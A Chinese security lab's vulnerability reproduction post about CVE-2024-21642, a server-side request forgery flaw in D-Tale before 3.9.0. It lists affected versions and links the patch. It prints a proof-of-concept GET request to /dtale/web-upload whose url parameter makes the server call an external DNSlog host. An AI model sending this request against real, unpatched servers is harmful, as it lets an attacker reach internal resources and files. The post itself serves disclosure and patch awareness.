网安引领时代,弥天点亮未来
本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!
Man Group D-Tale是Man Group公司的一个pandas数据结构的可视化工具。
Man Group D-Tale 3.9.0之前版本存在代码问题漏洞。攻击者利用该漏洞能够访问服务器上的文件。
D-Tale < 3.9.0
1.访问漏洞环境
2.对漏洞进行复现
POC (GET)
漏洞复现
GET /dtale/web-upload?type=csv&url=http://mujjyyvcrp.dgrh3.cn HTTP/1.1Host: 127.0.0.1
执行payload
测试DNSlog(漏洞存在)
3.nuclei工具测试(漏洞存在)
目前厂商已发布升级补丁以修复漏洞,补丁获取链接:
https://github.com/man-group/dtale/commit/954f6be1a06ff8629ead2c85c6e3f8e2196b3df2
原文始发于微信公众号(弥天安全实验室):【成功复现】D-Tale服务器端请求伪造漏洞(CVE-2024-21642)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论